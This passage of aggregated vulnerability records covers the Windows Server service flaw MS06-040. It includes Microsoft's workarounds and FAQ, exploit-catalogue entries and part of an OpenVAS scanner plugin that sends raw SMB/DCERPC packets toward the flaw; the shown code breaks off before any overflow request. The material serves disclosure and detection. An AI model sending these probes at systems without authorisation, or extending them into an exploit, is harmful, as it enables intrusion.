There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nSMS uses MBSA for detection. Therefore, SMS has the same limitation that is listed earlier in this bulletin related to programs that MBSA does not detect.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nBuffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\r\nThere is a remote code execution vulnerability in Server Service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.\r\n\t\r\nMitigating Factors for Buffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. 
Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Buffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall:\r\n\r\nThis port is used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, visit the following Web site.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, use a personal firewall, such as the Internet Connection Firewall, which is included with Windows XP and with Windows Server 2003.\r\n\r\nBy default, the Internet Connection Firewall feature in Windows XP and in Windows Server 2003 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet. In Windows XP Service Pack 2 this feature is called the Windows Firewall.\r\n\r\nTo enable the Internet Connection Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Network and Internet Connections, and then click Setup or change your home or small office network. 
The Internet Connection Firewall feature is enabled when you select a configuration in the Network Setup Wizard that indicates that your system is connected directly to the Internet.\r\n\r\nTo configure Internet Connection Firewall manually for a connection, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Networking and Internet Connections, and then click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nRight-click the connection on which you want to enable Internet Connection Firewall, and then click Properties.\r\n\r\n4.\r\n\t\r\n\r\nClick the Advanced tab.\r\n\r\n5.\r\n\t\r\n\r\nClick to select the Protect my computer or network by limiting or preventing access to this computer from the Internet check box, and then click OK.\r\n\r\nNote If you want to enable certain programs and services to communicate through the firewall, click Settings on the Advanced tab, and then select the programs, the protocols, and the services that are required.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, enable advanced TCP/IP filtering on systems that support this feature.\r\n\r\nYou can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, block the affected ports by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. 
Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Buffer Overrun in Server Service Vulnerability - CVE-2006-3439:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the Server service.\r\n\r\nWhat is the Server service?\r\nThe Server service provides RPC support, file print support and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could try to exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. 
The message could then cause the affected system to execute code.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWhile all workstations and servers are at risk regarding this issue, Windows 2000 systems are primarily at risk due to the unique characteristics of the vulnerability and affected code path.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Server service validates the length of a message it receives in RPC communications before it passes the message to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. When the security bulletin was released, Microsoft had received information that this vulnerability was being exploited.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is currently being exploited. 
The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2006-3439.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS06-035?\r\nWhile both vulnerabilities were in Server service this update addresses a new vulnerability that was not addressed as part of MS06-035. MS06-035 helps protect against the vulnerability that is discussed in that bulletin, but does not address this new vulnerability. This update does not replace MS06-035. You must install this update and the update that is provided as part of the MS06-035 security bulletin to help protect your system against both vulnerabilities.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (August 8, 2006): Bulletin published.", "modified": "2006-08-08T00:00:00", "published": "2006-08-08T00:00:00", "id": "SECURITYVULNS:DOC:13789", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13789", "title": "Microsoft Security Bulletin MS06-040 Vulnerability in Server Service Could Allow Remote Code Execution (921883)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "exploit", "description": "Added: 08/11/2006 \nCVE: [CVE-2006-3439](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439>) \nBID: [19409](<http://www.securityfocus.com/bid/19409>) \nOSVDB: [27845](<http://www.osvdb.org/27845>) \n\n\n### Background\n\nThe Windows Server Service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability in the Windows Server Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 and Windows XP SP1. Target computer may reboot after connection is closed. 
\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-08-11T00:00:00", "published": "2006-08-11T00:00:00", "id": "SAINT:196A97F73EEF3B5D1EFCFB0026B813A8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_server_service", "title": "Windows Server Service buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 08/11/2006 \nCVE: [CVE-2006-3439](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439>) \nBID: [19409](<http://www.securityfocus.com/bid/19409>) \nOSVDB: [27845](<http://www.osvdb.org/27845>) \n\n\n### Background\n\nThe Windows Server Service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability in the Windows Server Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 and Windows XP SP1. Target computer may reboot after connection is closed. 
\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-08-11T00:00:00", "published": "2006-08-11T00:00:00", "id": "SAINT:CF84C615CA476A001FFE4FD66C27D477", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_server_service", "type": "saint", "title": "Windows Server Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:06", "bulletinFamily": "exploit", "description": "Added: 08/11/2006 \nCVE: [CVE-2006-3439](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439>) \nBID: [19409](<http://www.securityfocus.com/bid/19409>) \nOSVDB: [27845](<http://www.osvdb.org/27845>) \n\n\n### Background\n\nThe Windows Server Service supports file, print, and named-pipe sharing over the network. \n\n### Problem\n\nA buffer overflow vulnerability in the Windows Server Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx> \n\n\n### Limitations\n\nExploit works on Windows 2000 and Windows XP SP1. Target computer may reboot after connection is closed. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2006-08-11T00:00:00", "published": "2006-08-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_server_service", "id": "SAINT:FAA2D7963586117985DEDCB8ABB67809", "type": "saint", "title": "Windows Server Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nA buffer overflow exists in Windows. 
The Server service fails to validate RPC messages resulting in a buffer overflow. With a specially crafted RPC message, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft Windows 2000, XP & Server 2003 Server Service Crafted RPC Message Remote Overflow\n## References:\n[Secunia Advisory ID:21388](https://secuniaresearch.flexerasoftware.com/advisories/21388/)\nNews Article: http://www.eweek.com/article2/0,1895,2002966,00.asp\nNews Article: http://www.techworld.com/security/news/index.cfm?newsID=6581\nNews Article: http://news.com.com/2100-7348_3-6103805.html?part=rss&tag=6103805&subj=news\nNews Article: http://www.infoworld.com/article/06/08/09/HNmspatchdhs_1.html\nMicrosoft Security Bulletin: MS06-040\nMicrosoft Knowledge Base Article: 921883\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2223\nFrSIRT Advisory: ADV-2006-3210\n[CVE-2006-3439](https://vulners.com/cve/CVE-2006-3439)\nCERT VU: 650769\n", "modified": "2006-08-08T14:35:02", "published": "2006-08-08T14:35:02", "href": "https://vulners.com/osvdb/OSVDB:27845", "id": "OSVDB:27845", "title": "Microsoft Windows Server Service Crafted RPC Message Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:39", "bulletinFamily": "exploit", "description": "**Name**| ms06_040 \n---|--- \n**CVE**| CVE-2006-3439 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Windows Server Service Overflow (MS06-040) \n**Notes**| References: http://www.microsoft.com/technet/security/Bulletin/MS06-040.mspx \nCVE Name: CVE-2006-3439 \nVENDOR: Microsoft \nMSADV: MS06-040 \nRepeatability: Infinite \nNote: Due to the 
primitive on the stack, the XP/2003 might not be that reliable. In worst case, try running it twice \nCVS URL: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439 \nDate public: 08/08/2006 \nCERT Advisory: http://www.kb.cert.org/vuls/id/650769 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439 \nCVSS: 10.0 \n\n", "modified": "2006-08-08T21:04:00", "published": "2006-08-08T21:04:00", "id": "MS06_040", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_040", "type": "canvas", "title": "Immunity Canvas: MS06_040", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:44:20", "bulletinFamily": "scanner", "description": "This host is missing important security update according to\n Microsoft Bulletin MS06-040.", "modified": "2018-10-19T00:00:00", "published": "2011-12-30T00:00:00", "id": "OPENVAS:1361412562310902782", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902782", "title": "Microsoft Windows Server Service Remote Code Execution Vulnerability (921883)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms06-040_remote.nasl 11987 2018-10-19 11:05:52Z mmartin $\n#\n# Microsoft Windows Server Service Remote Code Execution Vulnerability (921883)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902782\");\n script_version(\"$Revision: 11987 $\");\n script_bugtraq_id(19409);\n script_cve_id(\"CVE-2006-3439\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"creation_date\", value:\"2011-12-30 11:26:07 +0530 (Fri, 30 Dec 2011)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 13:05:52 +0200 (Fri, 19 Oct 2018) $\");\n script_name(\"Microsoft Windows Server Service Remote Code Execution Vulnerability (921883)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/21388/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1016667\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms06-040\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote code execution by sending a\n specially crafted RPC request and can take complete control of an affected system.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows XP Service Pack 2 and prior\n\n Microsoft Windows 2K3 Service Pack 1 and prior\n\n Microsoft Windows 2000 Service Pack 4 and prior.\");\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error in the 'CanonicalizePathName()'\n function in 
netapi32.dll and can be exploited to cause a stack-based buffer\n overflow via a malicious NetrpPathCanonicalize RPC request with an overly\n long path name to the Server Service.\");\n script_tag(name:\"solution\", value:\"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory\");\n script_tag(name:\"summary\", value:\"This host is missing important security update according to\n Microsoft Bulletin MS06-040.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\n\nname = kb_smb_name();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp ) {\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif( smb_sess_resp && strlen( smb_sess_resp ) > 33 ) {\n uid_low = ord( smb_sess_resp[32] );\n uid_high = ord( smb_sess_resp[33] );\n uid = uid_high * 256;\n uid += uid_low;\n} else {\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string( uid_low, uid_high ) +\n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 
0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif( ! smb_tree_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## NT Create AndX Request, FID: 0x4000, Path: \\browser\nnt_creat_req = raw_string(0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,\n 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x00, 0x01, 0x18, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x10, 0x00, 0x16, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x12, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x40, 0x00,\n 0x02, 0x00, 0x00, 0x00, 0x03, 0x13, 0x00, 0x00,\n 0x5c, 0x00, 0x62, 0x00, 0x72, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x00, 0x00);\n\nsend( socket:soc, data:nt_creat_req );\nnt_creat_resp = smb_recv( socket:soc );\nif( ! 
nt_creat_resp ) {\n close( soc );\n exit( 0 );\n}\n\n## DCERPC Bind: call_id: 0 SRVSVC V3.0\ndcerpc_bind_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xc5, 0xa6,\n 0x00, 0x08, 0x40, 0x01, 0x0e, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff,\n 0xff, 0xff, 0xff, 0x08, 0x00, 0x48, 0x00, 0x00,\n 0x00, 0x48, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x49, 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03,\n 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 0x32, 0x4b,\n 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a, 0x47,\n 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00,\n 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,\n 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,\n 0x02, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:dcerpc_bind_req );\ndcerpc_bind_resp = smb_recv( socket:soc );\nif( ! 